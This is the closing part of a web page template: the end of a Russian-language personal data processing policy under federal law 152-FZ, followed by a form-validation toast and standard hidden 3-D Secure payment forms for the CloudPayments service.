                обработка персональных данных необходима для осуществления профессиональной деятельности журналиста и (или) законной деятельности средства массовой информации либо научной, литературной или иной творческой деятельности при условии, что при этом не нарушаются права и законные интересы субъекта персональных данных.
                2.9 Трансграничная передача персональных данных

                Оператор обязан убедиться в том, что иностранным государством, на территорию которого предполагается осуществлять передачу персональных данных, обеспечивается адекватная защита прав субъектов персональных данных, до начала осуществления такой передачи.

                Трансграничная передача персональных данных на территории иностранных государств, не обеспечивающих адекватной защиты прав субъектов персональных данных, может осуществляться в случаях:

                наличия согласия в письменной форме субъекта персональных данных на трансграничную передачу его персональных данных;
                исполнения договора, стороной которого является субъект персональных данных.
                3. Права субъекта персональных данных

                3.1 Согласие субъекта персональных данных на обработку его персональных данных

                Субъект персональных данных принимает решение о предоставлении его персональных данных и дает согласие на их обработку свободно, своей волей и в своем интересе. Согласие на обработку персональных данных может быть дано субъектом персональных данных или его представителем в любой позволяющей подтвердить факт его получения форме, если иное не установлено федеральным законом.



                3.2 Права субъекта персональных данных

                Субъект персональных данных имеет право на получение у Оператора информации, касающейся обработки его персональных данных, если такое право не ограничено в соответствии с федеральными законами. Субъект персональных данных вправе требовать от Оператора уточнения его персональных данных, их блокирования или уничтожения в случае, если персональные данные являются неполными, устаревшими, неточными, незаконно полученными или не являются необходимыми для заявленной цели обработки, а также принимать предусмотренные законом меры по защите своих прав.

                Обработка персональных данных в целях продвижения товаров, работ, услуг на рынке путем осуществления прямых контактов с субъектом персональных данных (потенциальным потребителем) с помощью средств связи, а также в целях политической агитации допускается только при условии предварительного согласия субъекта персональных данных.

                Оператор обязан немедленно прекратить по требованию субъекта персональных данных обработку его персональных данных в вышеуказанных целях.

                Запрещается принятие на основании исключительно автоматизированной обработки персональных данных решений, порождающих юридические последствия в отношении субъекта персональных данных или иным образом затрагивающих его права и законные интересы, за исключением случаев, предусмотренных федеральными законами, или при наличии согласия в письменной форме субъекта персональных данных.

                Если субъект персональных данных считает, что Оператор осуществляет обработку его персональных данных с нарушением требований ФЗ-152 или иным образом нарушает его права и свободы, субъект персональных данных вправе обжаловать действия или бездействие Оператора в Уполномоченный орган по защите прав субъектов персональных данных или в судебном порядке.

                Субъект персональных данных имеет право на защиту своих прав и законных интересов, в том числе на возмещение убытков и (или) компенсацию морального вреда.



                4. Обеспечение безопасности персональных данных

                Безопасность персональных данных, обрабатываемых Оператором, обеспечивается реализацией правовых, организационных и технических мер, необходимых для обеспечения требований федерального законодательства в области защиты персональных данных.

                Для предотвращения несанкционированного доступа к персональным данным Оператором применяются следующие организационно-технические меры:

                назначение должностных лиц, ответственных за организацию обработки и защиты персональных данных;
                ограничение состава лиц, допущенных к обработке персональных данных;
                ознакомление субъектов с требованиями федерального законодательства и нормативных документов Оператора по обработке и защите персональных данных;
                организация учета, хранения и обращения носителей, содержащих информацию с персональными данными;
                определение угроз безопасности персональных данных при их обработке, формирование на их основе моделей угроз;
                разработка на основе модели угроз системы защиты персональных данных;
                проверка готовности и эффективности использования средств защиты информации;
                разграничение доступа пользователей к информационным ресурсам и программно-аппаратным средствам обработки информации;
                регистрация и учет действий пользователей информационных систем персональных данных;
                использование антивирусных средств и средств восстановления системы защиты персональных данных;
                применение в необходимых случаях средств межсетевого экранирования, обнаружения вторжений, анализа защищенности и средств криптографической защиты информации;
                организация пропускного режима на территорию Оператора, охраны помещений с техническими средствами обработки персональных данных.
                5. Заключительные положения

                Иные права и обязанности Оператора в связи с обработкой персональных данных определяются законодательством Российской Федерации в области персональных данных.

                Работники Оператора, виновные в нарушении норм, регулирующих обработку и защиту персональных данных, несут материальную, дисциплинарную, административную, гражданско-правовую или уголовную ответственность в порядке, установленном федеральными законами.
            </div>
        </div>
    </div>

    <!-- POPUP PRIVACY POLICY END -->
    <div id="toast" class="toast bg-warning ">
        <span>Fill in the field</span> <b>First name</b>
        <button id="closeName" class="toast__close" type="button">×</button>
    </div>

    <form name="secure" id="secure" action="" method="POST">
        <input type="hidden" name="PaReq" value="">
        <input type="hidden" name="MD" value="">
        <input type="hidden" name="TermUrl" value="">
    </form>
    <form action="https://api.cloudpayments.ru/payments/cards/post3ds" id="post3ds" method="POST">
        <input type="hidden" name="PaRes" value="">
        <input type="hidden" name="TransactionId" value="">
    </form>
</x-client.layouts.app>
